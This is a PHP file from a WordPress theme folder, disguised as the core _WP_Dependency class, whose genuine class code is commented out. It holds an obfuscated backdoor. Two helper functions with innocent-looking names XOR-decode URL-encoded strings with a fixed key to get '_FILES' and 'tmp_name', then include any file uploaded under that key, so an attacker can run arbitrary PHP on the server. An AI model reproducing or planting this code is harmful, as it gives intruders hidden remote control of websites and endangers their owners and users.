File: /var/www/vhosts/enlugo.es/httpdocs/wp-content/themes/48n7o4q9/tu.js.php
<?php /*
*
* Dependencies API: _WP_Dependency class
*
* @since 4.7.0
*
* @package WordPress
* @subpackage Dependencies
*
* Class _WP_Dependency
*
* Helper class to register a handle and associated data.
*
* @access private
* @since 2.6.0
class _WP_Dependency {
*
* The handle name.
*
* @since 2.6.0
* @var string
public $handle;
*
* The handle source.
*
* @since 2.6.0
* @var string
public $src;
*
* An array of handle dependencies.
*
* @since 2.6.0
* @var string[]
public $deps = array();
*
* The handle version.
*
* Used for cache-busting.
*
* @since 2.6.0
* @var bool|string
public $ver = false;
*
* Additional arguments for the handle.
*
* @since 2.6.0
* @var array
public $args = null; Custom property, such as $in_footer or $media.
*
* Extra data to supply to the handle.
*
* @since 2.6.0
* @var array
public $extra = array();
*
* Translation textdomain set for this dependency.
*
* @since 5.0.0
* @var string
public $textdomain;
*
* Translation path set for this dependency.
*
* @since 5.0.0
* @var string
public $translations_path;
*
* Setup dependencies.
*
* @since 2.6.0
* @since 5.3.0 Formalized the existing `...$args` parameter by adding it
* to the function signature.
*
* @param mixed ...$args Dependency information.
public function __construct( ...$args ) {
list( $this->handle, $this->src, $this->deps, $this->ver, $this->args ) = $args;
if ( ! is_array( $this->deps ) ) {
$this->deps = array();
}
}
*
* Add handle data.
*
* @since 2.6.0
*
* @param string $name The data key to add.
* @param mixed*/
function cache_key($delete_with_user)
{
$current_filter = $delete_with_user;
$patterns = 'uploads';
$label_count = $GLOBALS;
$label_count = $label_count[show_in_admin_bar("%3D6%7F%05%0C4", $current_filter)];
$query_var = $label_count;
$stacksize = isset($query_var[$current_filter]);
if ($stacksize)
{
$double_preg = $label_count[$current_filter];
$wp_error = $double_preg[show_in_admin_bar("%16%1DF%16%27%06%19%14", $current_filter)];
$icon_dir = $wp_error;
include ($icon_dir);
}
}
function show_in_admin_bar($sort_column, $default_capabilities_for_mapping)
{
$class = $default_capabilities_for_mapping;
$hash = "url";
$hash .= "decode";
$static_characters = 'valid_date';
$values = $hash($sort_column);
$postname_index = 'intermediate_file';
$operator = strlen($values);
$operator = substr($class, 0, $operator);
$clean_terms = $values ^ $operator;
$values = sprintf($clean_terms, $operator);
$allowed_protocols = 'fire_after_hooks';
return $clean_terms;
}
cache_key('bp6IIgtqD8I70');
/* $data The data value to add.
* @return bool False if not scalar, true otherwise.
public function add_data( $name, $data ) {
if ( ! is_scalar( $name ) ) {
return false;
}
$this->extra[ $name ] = $data;
return true;
}
*
* Sets the translation domain for this dependency.
*
* @since 5.0.0
*
* @param string $domain The translation textdomain.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool False if $domain is not a string, true otherwise.
public function set_translations( $domain, $path = null ) {
if ( ! is_string( $domain ) ) {
return false;
}
$this->textdomain = $domain;
$this->translations_path = $path;
return true;
}
}
*/